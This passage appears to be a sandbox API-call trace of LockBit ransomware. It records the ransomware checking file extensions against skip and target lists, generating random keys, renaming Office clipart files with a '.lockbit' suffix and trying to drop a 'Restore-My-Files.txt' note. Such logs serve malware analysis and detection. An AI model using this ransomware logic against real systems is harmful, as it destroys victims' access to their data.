lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0142.243] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0142.243] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0142.243] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0142.243] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0142.243] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0142.243] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0142.243] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0142.243] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0142.243] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0142.243] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0142.243] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0142.243] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0142.243] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0142.243] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0142.243] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0142.243] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0142.243] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0142.243] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0142.243] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0142.243] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0142.243] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0142.243] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107744.WMF.lockbit") returned 72 [0142.243] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107744.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107744.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0142.246] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0142.246] malloc (_Size=0x40068) returned 0x1ff1e60 [0142.246] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=5004) returned 1 [0142.247] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.247] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.247] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0142.247] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.247] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.247] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0142.247] ReadFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0142.249] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107744.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107744.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0142.249] malloc (_Size=0xa6) returned 0x77d7a8 [0142.249] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0142.250] free (_Block=0x77d7a8) [0142.250] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107744.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0142.250] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0142.250] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0142.250] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x563e0210, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x12b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107746.WMF", cAlternateFileName="")) returned 1 [0142.250] lstrcmpiW (lpString1=".", lpString2="J0107746.WMF") returned -1 [0142.250] lstrcmpiW (lpString1="..", lpString2="J0107746.WMF") returned -1 [0142.250] PathFindExtensionW (pszPath="J0107746.WMF") returned=".WMF" [0142.250] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0142.250] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0142.250] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0142.250] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0142.250] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0142.250] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0142.250] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0142.250] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0142.250] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0142.250] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0142.250] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0142.250] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0142.251] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0142.251] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0142.251] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0142.251] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0142.251] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0142.251] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0142.251] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0142.251] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0142.251] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0142.251] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0142.251] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0142.251] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0142.251] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0142.251] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0142.251] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0142.251] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0142.251] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0142.251] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0142.251] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0142.251] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0142.251] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0142.251] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0142.251] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0142.251] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0142.251] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0142.251] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0142.251] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0142.251] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0142.251] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0142.252] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0142.252] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0142.252] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0142.252] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0142.252] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0142.252] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0142.252] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107746.WMF") returned 1 [0142.252] lstrcmpiW (lpString1="ntldr", lpString2="J0107746.WMF") returned 1 [0142.252] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107746.WMF") returned 1 [0142.252] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107746.WMF") returned -1 [0142.252] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107746.WMF") returned -1 [0142.252] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107746.WMF") returned 1 [0142.252] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107746.WMF") returned -1 [0142.252] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0142.252] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107746.WMF") returned=".WMF" [0142.252] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0142.252] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0142.252] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0142.252] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0142.252] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0142.252] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0142.252] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0142.252] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0142.252] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0142.252] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0142.252] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0142.252] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0142.252] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0142.253] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0142.253] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0142.253] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0142.253] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0142.253] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0142.253] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0142.253] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0142.253] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0142.253] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0142.253] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0142.253] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0142.253] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0142.253] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0142.253] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0142.253] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0142.253] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107746.WMF.lockbit") returned 72 [0142.253] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107746.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107746.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0142.253] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0142.254] malloc (_Size=0x40068) returned 0x3d70450 [0142.254] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=4788) returned 1 [0142.254] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.254] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.254] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0142.254] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.254] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.254] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0142.254] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0142.280] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107746.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107746.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0142.281] malloc (_Size=0xa6) returned 0x77d7a8 [0142.281] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0142.282] free (_Block=0x77d7a8) [0142.282] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107746.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0142.282] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0142.282] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0142.282] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65edb1b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2020, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107748.WMF", cAlternateFileName="")) returned 1 [0142.282] lstrcmpiW (lpString1=".", lpString2="J0107748.WMF") returned -1 [0142.282] lstrcmpiW (lpString1="..", lpString2="J0107748.WMF") returned -1 [0142.282] PathFindExtensionW (pszPath="J0107748.WMF") returned=".WMF" [0142.282] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0142.282] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0142.282] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0142.282] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0142.282] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0142.282] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0142.282] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0142.282] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0142.282] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0142.282] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0142.282] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0142.282] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0142.282] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0142.282] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0142.282] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0142.282] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0142.283] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0142.283] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0142.283] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0142.283] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0142.283] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0142.283] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0142.283] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0142.283] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0142.283] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0142.283] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0142.283] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0142.283] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0142.283] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0142.283] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0142.283] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0142.283] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0142.283] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0142.283] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0142.283] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0142.283] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0142.283] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0142.283] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0142.283] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0142.283] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0142.283] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0142.283] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0142.284] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0142.284] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0142.284] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0142.284] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0142.284] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0142.284] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107748.WMF") returned 1 [0142.284] lstrcmpiW (lpString1="ntldr", lpString2="J0107748.WMF") returned 1 [0142.284] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107748.WMF") returned 1 [0142.284] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107748.WMF") returned -1 [0142.284] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107748.WMF") returned -1 [0142.284] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107748.WMF") returned 1 [0142.284] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107748.WMF") returned -1 [0142.284] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0142.284] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107748.WMF") returned=".WMF" [0142.284] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0142.284] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0142.284] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0142.284] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0142.284] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0142.284] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0142.284] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0142.284] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0142.284] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0142.284] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0142.284] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0142.284] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0142.284] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0142.284] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0142.284] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0142.285] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0142.285] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0142.285] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0142.285] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0142.285] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0142.285] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0142.285] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0142.285] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0142.285] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0142.285] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0142.285] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0142.285] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0142.285] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0142.285] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107748.WMF.lockbit") returned 72 [0142.285] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107748.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107748.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0142.286] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0142.286] malloc (_Size=0x40068) returned 0x3df0008 [0142.286] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=8224) returned 1 [0142.286] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.287] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.287] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0142.287] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.287] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.287] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0142.287] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0142.801] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107748.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107748.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0142.801] malloc (_Size=0xa6) returned 0x77d7a8 [0142.801] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0142.803] free (_Block=0x77d7a8) [0142.803] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107748.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0142.803] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0142.803] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0142.804] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65edb1b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x126c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107750.WMF", cAlternateFileName="")) returned 1 [0142.804] lstrcmpiW (lpString1=".", lpString2="J0107750.WMF") returned -1 [0142.804] lstrcmpiW (lpString1="..", lpString2="J0107750.WMF") returned -1 [0142.804] PathFindExtensionW (pszPath="J0107750.WMF") returned=".WMF" [0142.804] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0142.804] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0142.804] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0142.804] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0142.804] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0142.804] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0142.804] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0142.804] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0142.804] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0142.804] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0142.804] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0142.804] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0142.805] lstrcmpiW (lpString1=".lock", 